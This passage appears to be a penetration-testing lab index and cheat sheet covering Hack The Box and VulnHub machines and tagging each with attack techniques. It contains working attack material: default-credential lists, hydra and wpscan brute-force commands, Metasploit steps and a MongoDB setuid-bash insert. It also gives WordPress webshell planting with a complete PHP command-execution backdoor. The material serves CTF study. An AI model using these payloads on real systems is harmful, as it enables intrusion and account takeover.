[`exploit_iis_asp_reverseshell`](https://github.com/7h3rAm/writeups#exploit_iis_asp_reverseshell), [`privesc_windows_ms11_046`](https://github.com/7h3rAm/writeups#privesc_windows_ms11_046) | | 12. | [Escalate_Linux: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.escalatelinux/writeup.pdf) | [vh#323](https://www.vulnhub.com/entry/escalate_linux-1,323/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.escalatelinux/killchain.png" width="100" height="100"/> | [`exploit_python_reverseshell`](https://github.com/7h3rAm/writeups#exploit_python_reverseshell), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) | | 13. | [FristiLeaks: 1.3](https://github.com/7h3rAm/writeups/blob/master/vulnhub.fristileaks1dot3/writeup.pdf) | [vh#133](https://www.vulnhub.com/entry/fristileaks-13,133/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.fristileaks1dot3/killchain.png" width="100" height="100"/> | [`exploit_php_fileupload`](https://github.com/7h3rAm/writeups#exploit_php_fileupload), [`exploit_php_fileupload_bypass`](https://github.com/7h3rAm/writeups#exploit_php_fileupload_bypass), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) | | 14. | [Grandpa](https://github.com/7h3rAm/writeups/blob/master/htb.grandpa/writeup.pdf)<br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.grandpa/matrix.png" width="59" height="59"/><br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.grandpa/ratings.png" width="59" height="20"/> | [htb#13](https://www.hackthebox.eu/home/machines/profile/13) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.grandpa/killchain.png" width="100" height="100"/> | [`exploit_iis_webdav`](https://github.com/7h3rAm/writeups#exploit_iis_webdav), [`privesc_windows_ms14_070`](https://github.com/7h3rAm/writeups#privesc_windows_ms14_070) | | 15. | [Granny](https://github.com/7h3rAm/writeups/blob/master/htb.granny/writeup.pdf)<br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.granny/matrix.png" width="59" height="59"/><br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.granny/ratings.png" width="59" height="20"/> | [htb#14](https://www.hackthebox.eu/home/machines/profile/14) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.granny/killchain.png" width="100" height="100"/> | [`exploit_iis_webdav`](https://github.com/7h3rAm/writeups#exploit_iis_webdav), [`privesc_windows_ms15_051`](https://github.com/7h3rAm/writeups#privesc_windows_ms15_051) | | 16. | [hackfest2016: Quaoar](https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/writeup.pdf) | [vh#180](https://www.vulnhub.com/entry/hackfest2016-quaoar,180/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/killchain.png" width="100" height="100"/> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_defaultcreds`](https://github.com/7h3rAm/writeups#exploit_wordpress_defaultcreds), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_credsreuse`](https://github.com/7h3rAm/writeups#privesc_credsreuse) | | 17. | [hackfest2016: Sedna](https://github.com/7h3rAm/writeups/blob/master/vulnhub.sedna/writeup.pdf) | [vh#181](https://www.vulnhub.com/entry/hackfest2016-sedna,181/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.sedna/killchain.png" width="100" height="100"/> | [`exploit_php_fileupload`](https://github.com/7h3rAm/writeups#exploit_php_fileupload), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_chkrootkit`](https://github.com/7h3rAm/writeups#privesc_chkrootkit), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_bash_reverseshell`](https://github.com/7h3rAm/writeups#privesc_bash_reverseshell) | | 18. | [HackLAB: Vulnix](https://github.com/7h3rAm/writeups/blob/master/vulnhub.vulnix/writeup.pdf) | [vh#48](https://www.vulnhub.com/entry/hacklab-vulnix,48/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.vulnix/killchain.png" width="100" height="100"/> | [`exploit_nfs_rw`](https://github.com/7h3rAm/writeups#exploit_nfs_rw), [`exploit_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#exploit_ssh_authorizedkeys), [`privesc_nfs_norootsquash`](https://github.com/7h3rAm/writeups#privesc_nfs_norootsquash), [`privesc_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#privesc_ssh_authorizedkeys) | | 19. | [hackme: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.hackme/writeup.pdf) | [vh#330](https://www.vulnhub.com/entry/hackme-1,330/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.hackme/killchain.png" width="100" height="100"/> | [`exploit_php_fileupload`](https://github.com/7h3rAm/writeups#exploit_php_fileupload), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) | | 20. | [IMF: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.imf/writeup.pdf) | [vh#162](https://www.vulnhub.com/entry/imf-1,162/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.imf/killchain.png" width="100" height="100"/> | [`exploit_php_fileupload_bypass`](https://github.com/7h3rAm/writeups#exploit_php_fileupload_bypass), [`privesc_bof`](https://github.com/7h3rAm/writeups#privesc_bof) | | 21. | [InfoSec Prep: OSCP](https://github.com/7h3rAm/writeups/blob/master/vulnhub.infosecpreposcp/writeup.pdf) | [vh#508](https://www.vulnhub.com/entry/infosec-prep-oscp,508/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.infosecpreposcp/killchain.png" width="100" height="100"/> | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_ssh_privatekeys`](https://github.com/7h3rAm/writeups#exploit_ssh_privatekeys), [`privesc_lxc_bash`](https://github.com/7h3rAm/writeups#privesc_lxc_bash) | | 22. | [Kioptrix: 2014 (#5)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix5/writeup.pdf) | [vh#62](https://www.vulnhub.com/entry/kioptrix-2014-5,62/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix5/killchain.png" width="100" height="100"/> | [`exploit_pchart`](https://github.com/7h3rAm/writeups#exploit_pchart), [`exploit_phptax`](https://github.com/7h3rAm/writeups#exploit_phptax), [`privesc_freebsd`](https://github.com/7h3rAm/writeups#privesc_freebsd) | | 23. | [Kioptrix: Level 1 (#1)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix1/writeup.pdf) | [vh#22](https://www.vulnhub.com/entry/kioptrix-level-1-1,22/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix1/killchain.png" width="100" height="100"/> | [`exploit_modssl`](https://github.com/7h3rAm/writeups#exploit_modssl), [`privesc_modssl`](https://github.com/7h3rAm/writeups#privesc_modssl) | | 24. | [Kioptrix: Level 1.1 (#2)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix2/writeup.pdf) | [vh#23](https://www.vulnhub.com/entry/kioptrix-level-11-2,23/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix2/killchain.png" width="100" height="100"/> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`exploit_cmdexec`](https://github.com/7h3rAm/writeups#exploit_cmdexec), [`privesc_kernel_ipappend`](https://github.com/7h3rAm/writeups#privesc_kernel_ipappend) | | 25. | [Kioptrix: Level 1.2 (#3)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix3/writeup.pdf) | [vh#24](https://www.vulnhub.com/entry/kioptrix-level-12-3,24/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix3/killchain.png" width="100" height="100"/> | [`exploit_lotuscms`](https://github.com/7h3rAm/writeups#exploit_lotuscms), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo) | | 26. | [Kioptrix: Level 1.3 (#4)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix4/writeup.pdf) | [vh#25](https://www.vulnhub.com/entry/kioptrix-level-13-4,25/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix4/killchain.png" width="100" height="100"/> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`privesc_shell_escape`](https://github.com/7h3rAm/writeups#privesc_shell_escape), [`privesc_mysql_root`](https://github.com/7h3rAm/writeups#privesc_mysql_root), [`privesc_mysql_udf`](https://github.com/7h3rAm/writeups#privesc_mysql_udf) | | 27. | [Lame](https://github.com/7h3rAm/writeups/blob/master/htb.lame/writeup.pdf)<br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.lame/matrix.png" width="59" height="59"/><br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.lame/ratings.png" width="59" height="20"/> | [htb#1](https://www.hackthebox.eu/home/machines/profile/1) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.lame/killchain.png" width="100" height="100"/> | [`exploit_smb_usermap`](https://github.com/7h3rAm/writeups#exploit_smb_usermap) | | 28. | [LazySysAdmin: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/writeup.pdf) | [vh#205](https://www.vulnhub.com/entry/lazysysadmin-1,205/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/killchain.png" width="100" height="100"/> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_smb_nullsession`](https://github.com/7h3rAm/writeups#exploit_smb_nullsession), [`exploit_smb_web_root`](https://github.com/7h3rAm/writeups#exploit_smb_web_root), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`exploit_wordpress_template`](https://github.com/7h3rAm/writeups#exploit_wordpress_template), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo) | | 29. | [Legacy](https://github.com/7h3rAm/writeups/blob/master/htb.legacy/writeup.pdf)<br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.legacy/matrix.png" width="59" height="59"/><br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.legacy/ratings.png" width="59" height="20"/> | [htb#2](https://www.hackthebox.eu/home/machines/profile/2) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.legacy/killchain.png" width="100" height="100"/> | [`exploit_smb_ms08_067`](https://github.com/7h3rAm/writeups#exploit_smb_ms08_067) | | 30. | [Lin.Security: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.linsecurity1/writeup.pdf) | [vh#244](https://www.vulnhub.com/entry/linsecurity-1,244/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.linsecurity1/killchain.png" width="100" height="100"/> | [`exploit_nfs_rw`](https://github.com/7h3rAm/writeups#exploit_nfs_rw), [`exploit_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#exploit_ssh_authorizedkeys), [`privesc_strace_setuid`](https://github.com/7h3rAm/writeups#privesc_strace_setuid), [`privesc_docker_group`](https://github.com/7h3rAm/writeups#privesc_docker_group) | | 31. | [Lord Of The Root: 1.0.1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.lordoftheroot101/writeup.pdf) | [vh#129](https://www.vulnhub.com/entry/lord-of-the-root-101,129/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.lordoftheroot101/killchain.png" width="100" height="100"/> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`privesc_kernel_overlayfs`](https://github.com/7h3rAm/writeups#privesc_kernel_overlayfs), [`privesc_mysql_root`](https://github.com/7h3rAm/writeups#privesc_mysql_root), [`privesc_mysql_udf`](https://github.com/7h3rAm/writeups#privesc_mysql_udf) | | 32. | [Mirai](https://github.com/7h3rAm/writeups/blob/master/htb.mirai/writeup.pdf)<br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.mirai/matrix.png" width="59" height="59"/><br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.mirai/ratings.png" width="59" height="20"/> | [htb#64](https://www.hackthebox.eu/home/machines/profile/64) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.mirai/killchain.png" width="100" height="100"/> | [`exploit_defaultcreds`](https://github.com/7h3rAm/writeups#exploit_defaultcreds), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | | 33. | [Misdirection: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.misdirection1/writeup.pdf) | [vh#371](https://www.vulnhub.com/entry/misdirection-1,371/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.misdirection1/killchain.png" width="100" height="100"/> | [`exploit_php_webshell`](https://github.com/7h3rAm/writeups#exploit_php_webshell), [`exploit_bash_reverseshell`](https://github.com/7h3rAm/writeups#exploit_bash_reverseshell), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers), [`privesc_passwd_writable`](https://github.com/7h3rAm/writeups#privesc_passwd_writable) | | 34. | [Moria: 1.1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.moria11/writeup.pdf) | [vh#187](https://www.vulnhub.com/entry/moria-11,187/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.moria11/killchain.png" width="100" height="100"/> | [`privesc_ssh_knownhosts`](https://github.com/7h3rAm/writeups#privesc_ssh_knownhosts) | | 35. | [Mr-Robot: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.mrrobot1/writeup.pdf) | [vh#151](https://www.vulnhub.com/entry/mr-robot-1,151/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.mrrobot1/killchain.png" width="100" height="100"/> | [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid), [`privesc_nmap`](https://github.com/7h3rAm/writeups#privesc_nmap) | | 36. | [Node: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.node1/writeup.pdf) | [vh#252](https://www.vulnhub.com/entry/node-1,252/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.node1/killchain.png" width="100" height="100"/> | [`exploit_nodejs`](https://github.com/7h3rAm/writeups#exploit_nodejs), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`exploit_mongodb`](https://github.com/7h3rAm/writeups#exploit_mongodb), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) | | 37. | [Optimum](https://github.com/7h3rAm/writeups/blob/master/htb.optimum/writeup.pdf)<br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.optimum/matrix.png" width="59" height="59"/><br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.optimum/ratings.png" width="59" height="20"/> | [htb#6](https://www.hackthebox.eu/home/machines/profile/6) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.optimum/killchain.png" width="100" height="100"/> | [`exploit_hfs_cmd_exec`](https://github.com/7h3rAm/writeups#exploit_hfs_cmd_exec), [`privesc_windows_ms16_098`](https://github.com/7h3rAm/writeups#privesc_windows_ms16_098) | | 38. | [Shocker](https://github.com/7h3rAm/writeups/blob/master/htb.shocker/writeup.pdf)<br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.shocker/matrix.png" width="59" height="59"/><br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.shocker/ratings.png" width="59" height="20"/> | [htb#108](https://www.hackthebox.eu/home/machines/profile/108) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.shocker/killchain.png" width="100" height="100"/> | [`exploit_shellshock`](https://github.com/7h3rAm/writeups#exploit_shellshock), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | | 39. | [Year of the Fox](https://github.com/7h3rAm/writeups/blob/master/thm.yotf/writeup.pdf) | [tryhackme#yotf](https://tryhackme.com/room/yotf) | <img src="https://github.com/7h3rAm/writeups/blob/master/thm.yotf/killchain.png" width="100" height="100"/> | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_command_injection`](https://github.com/7h3rAm/writeups#exploit_command_injection), [`privesc_env_relative_path`](https://github.com/7h3rAm/writeups#privesc_env_relative_path) | <a name="ttps"></a> ## ☢️ TTPs [↟](#contents) <a name="enumerate"></a> ### ⚙️ Enumerate [🡑](#ttps) <a name="enumerate_app_apache"></a> #### enumerate_app_apache [⇡](#enumerate) ```shell use directory traversal to checkout the config file: /usr/local/etc/apache22/httpd.conf /etc/apache2/sites-enabled/000-default.conf useful when certain config changes block enumeration ``` --- <a name="enumerate_app_apache_tomcat"></a> #### enumerate_app_apache_tomcat [⇡](#enumerate) ```shell tomcat manager default creds: tomcat:tomcat admin:admin admin:password user:password tomcat:s3cret ``` [+] https://0xrick.github.io/hack-the-box/jerry/ --- <a name="enumerate_app_coldfusion_files"></a> #### enumerate_app_coldfusion_files [⇡](#enumerate) look for available sub driectories and files on a coldfusion install ```shell dirb http://<targetip>:<targetport> /usr/share/dirb/wordlists/vulns/coldfusion.txt ``` [+] https://medium.com/@_C_3PJoe/htb-retired-box-write-up-arctic-50eccccc560 --- <a name="enumerate_app_coldfusion_version"></a> #### enumerate_app_coldfusion_version [⇡](#enumerate) find out the coldfusion install version ```shell http://<targetip>:<targetport>/CFIDE/adminapi/base.cfc?wsdl ``` [+] http://www.carnal0wnage.com/papers/LARES-ColdFusion.pdf (pg42) --- <a name="enumerate_app_drupal"></a> #### enumerate_app_drupal [⇡](#enumerate) ```shell version: http://<targetip>:<targetport>/CHANGELOG.txt bruteforce: ipaddr="<targetip>"; id=$(curl -s http://$ipaddr/user/ | grep "form_build_id" | cut -d"\"" -f6); hydra -L userlist.txt -P /usr/share/wordlists/rockyou.txt $site http-form-post "/?q=user/:name=^USER^&pass=^PASS^&form_id=user_login&form_build_id="$id":Sorry" -V scan: /opt/droopescan/droopescan scan drupal -u http://<targetip> ``` [+] https://zayotic.com/posts/oscp-reference/ --- <a name="enumerate_app_joomla"></a> #### enumerate_app_joomla [⇡](#enumerate) ```shell joomscan --url http://<targetip> ``` [+] https://zayotic.com/posts/oscp-reference/ --- <a name="enumerate_app_mongo"></a> #### enumerate_app_mongo [⇡](#enumerate) ```shell mongo -p -u mark scheduler => connects to mongodb as user mark and allows interaction with db scheduler use scheduler => switch db db.getCollectionNames() => list all collections/tables db.tasks.find({}) => show all entries from collection/table db.tasks.insert({"cmd": "cp /bin/bash /tmp/bash; chmod u+s /tmp/bash;"}) => insert a new entry within table tasks ``` --- <a name="enumerate_app_nodejs"></a> #### enumerate_app_nodejs [⇡](#enumerate) ```shell check source and look at the js files to find interesting links/apis use burp to spider and create a sitemap of the website find app.js and look for db credentials (sql/mongo) try ssh using db credentials ``` --- <a name="enumerate_app_pfsense"></a> #### enumerate_app_pfsense [⇡](#enumerate) ```shell default credentials: admin/pfsense ``` --- <a name="enumerate_app_phpmyadmin"></a> #### enumerate_app_phpmyadmin [⇡](#enumerate) ```shell default credentials: admin/ admin/admin root/root root/password root/mysql ``` --- <a name="enumerate_app_powershell_history"></a> #### enumerate_app_powershell_history [⇡](#enumerate) For certain accounts (like `sql_svc`) that are both user and service accounts, we can look at the user's PowerShell history and find interesting information. ```shell type C:\Users\<username>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Archetype](https://github.com/7h3rAm/writeups/blob/master/htb.archetype/writeup.pdf) | [htb#archetype](https://www.hackthebox.eu/home/start) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.archetype/killchain.png" width="100" height="100" /> | [`enumerate_proto_smb`](https://github.com/7h3rAm/writeups#enumerate_proto_smb), [`enumerate_proto_smb_anonymous_access`](https://github.com/7h3rAm/writeups#enumerate_proto_smb_anonymous_access), [`enumerate_proto_sql`](https://github.com/7h3rAm/writeups#enumerate_proto_sql), [`enumerate_proto_sql_ssis_dtsconfig`](https://github.com/7h3rAm/writeups#enumerate_proto_sql_ssis_dtsconfig), [`exploit_sql_login`](https://github.com/7h3rAm/writeups#exploit_sql_login), [`exploit_sql_xpcmdshell`](https://github.com/7h3rAm/writeups#exploit_sql_xpcmdshell), [`enumerate_app_powershell_history`](https://github.com/7h3rAm/writeups#enumerate_app_powershell_history), [`privesc_psexec_login`](https://github.com/7h3rAm/writeups#privesc_psexec_login) | --- <a name="enumerate_app_prtg"></a> #### enumerate_app_prtg [⇡](#enumerate) ```shell default credentials: prtgadmin/prtgadmin configuration and backup files (accessed via an open ftp/smb): c:\programdata\paessler\Configuration.dat c:\programdata\paessler\Configuration.old ``` --- <a name="enumerate_app_unrealirc"></a> #### enumerate_app_unrealirc [⇡](#enumerate) ```shell msfconsole use exploit/unix/irc/unreal_ircd_3281_backdoor set rhost <targetip> set rport <targetport> exploit ``` [+] https://snowscan.io/htb-writeup-irked/ --- <a name="enumerate_app_webmin"></a> #### enumerate_app_webmin [⇡](#enumerate) ```shell view any file - even root owned, run perl cgi scripts msf: auxiliary/admin/webmin/file_disclosure can view /etc/ldap.secret file that might give credentials can be used to run a perl cgi script (uploaded via some other means) to gain root reverse shell download shadow file and try cracking hashes download ssh authorized_keys for users (names obtained from shadow file), use edb:5720 and "ssh -i" ``` --- <a name="enumerate_app_wordpress"></a> #### enumerate_app_wordpress [⇡](#enumerate) ```shell default creds: admin/password look for phpmyadmin, plugins directories look for wp-config.php file (via an open smb/ftp share) => contains db creds, useful for phpmyadmin and ssh enumerate authors: http://192.168.92.167:<targetport>/?author=1 => will show username as "AUTHOR ARCHIVES: <username>" http://192.168.92.167:<targetport>/?author=2 => will not show username if author id is invalid wpuser http://192.168.92.134/ usernames wpscan --url http://192.168.92.134:80/ -e vp,vt,tt,cb,dbe,u,m bruteforce wordpress login: wpscan --url http://192.168.92.134 -P fsocity.dic.trimmed -U elliot wpscan --url http://192.168.92.169/backup_wordpress/ -P /usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt -U admin,john wpscan --disable-tls-checks --url https://192.168.92.165:12380/blogblog/ -P $HOME/toolbox/vulnhub/mrrobot1/pass.list -U elliot hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.92.169 http-post-form "/backup_wordpress/wp-login.php:log=admin&pwd=^PASS^:ERROR" wordpress to shell: #1 add webshell via /wp-admin/theme-editor.php?file=404.php a. "Appearance" -> "Editor" b. select "404 Template" (404.php) c. add php backdoor before the `<?php get_footer(); ?>` line and click "Update File" d. example php backdoor: /usr/share/webshells/php/php-reverse-shell.php e. run local netcat listener f. visit a non-existing page: http://192.168.92.191/wordpress/?p=<attackerport>99 #2 add webshell @ /wp-admin/ a. "Appearance" -> "Editor" b. select "Theme Footer" (footer.php) c. add php backdoor at the end of file and click "Update File" d. example php backdoor: <!-- Inpired by DK's Simple PHP backdoor (http://michaeldaw.org) --> <?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); exec($cmd, $results); foreach( $results as $r ) { echo $r."<br/>"; } echo "</pre>"; die; } ?> /*Usage: http://domain/path?cmd=cat+/etc/passwd*/ e. visit http://192.168.92.169/backup_wordpress/?cmd=cat%20/etc/passwd to run commands f. result will be concatenated to the end of the page #3 add webshell via media file @ /wp-admin/plugin-install.php a. "Upload plugin" -> "Browse" b. example php backdoor: <!-- Inpired by DK's Simple PHP backdoor (http://michaeldaw.org) --> <?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); exec($cmd, $results); foreach( $results as $r ) { echo $r."<br/>"; } echo "</pre>"; die; } ?> /*Usage: http://domain/path?cmd=cat+/etc/passwd*/ c. plugin install might fail, but php file will be uploaded as a media file d. visit http://192.168.92.169/backup_wordpress/wp-admin/upload.php to confirm file upload e. use http://192.168.92.169/backup_wordpress/wp-content/uploads/<year>/<monthid>/<filename>.php?cmd=cat%20/etc/passwd to run commands #4 metasploit: msf> use exploit/unix/webapp/wp_admin_shell_upload msf exploit(unix/webapp/wp_admin_shell_upload) > set rhost 192.168.92.169 msf exploit(unix/webapp/wp_admin_shell_upload) > set targeturi /backup-wordpress msf exploit(unix/webapp/wp_admin_shell_upload) > set username john msf exploit(unix/webapp/wp_admin_shell_upload) > set password enigma msf exploit(unix/webapp/wp_admin_shell_upload) > exploit extract hashes from wp mysql db and crack via john: select concat_ws(':', user_login, user_pass) from wp_users; john --wordlist=/usr/share/wordlists/rockyou.txt hashes.wp ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Blocky](https://github.com/7h3rAm/writeups/blob/master/htb.blocky/writeup.pdf) | [htb#48](https://www.hackthebox.eu/home/machines/profile/48) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.blocky/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | | 2. | [LazySysAdmin: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/writeup.pdf) | [vh#205](https://www.vulnhub.com/entry/lazysysadmin-1,205/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_smb_nullsession`](https://github.com/7h3rAm/writeups#exploit_smb_nullsession), [`exploit_smb_web_root`](https://github.com/7h3rAm/writeups#exploit_smb_web_root), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`exploit_wordpress_template`](https://github.com/7h3rAm/writeups#exploit_wordpress_template), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo) | | 3. | [hackfest2016: Quaoar](https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/writeup.pdf) | [vh#180](https://www.vulnhub.com/entry/hackfest2016-quaoar,180/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_defaultcreds`](https://github.com/7h3rAm/writeups#exploit_wordpress_defaultcreds), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_credsreuse`](https://github.com/7h3rAm/writeups#privesc_credsreuse) | | 4. | [DC: 6](https://github.com/7h3rAm/writeups/blob/master/vulnhub.dc6/writeup.pdf) | [vh#315](https://www.vulnhub.com/entry/dc-6,315/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.dc6/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin_activitymonitor`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_activitymonitor), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_nmap`](https://github.com/7h3rAm/writeups#privesc_nmap) | | 5. | [BSides Vancouver: 2018 (Workshop)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/writeup.pdf) | [vh#231](https://www.vulnhub.com/entry/bsides-vancouver-2018-workshop,231/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/killchain.png" width="100" height="100" /> | [`enumerate_proto_ftp`](https://github.com/7h3rAm/writeups#enumerate_proto_ftp), [`enumerate_proto_ssh`](https://github.com/7h3rAm/writeups#enumerate_proto_ssh), [`exploit_ssh_bruteforce`](https://github.com/7h3rAm/writeups#exploit_ssh_bruteforce), [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | --- <a name="enumerate_file_modified_time_window"></a> #### enumerate_file_modified_time_window [⇡](#enumerate) find files modified within a time window ```shell find / -newermt 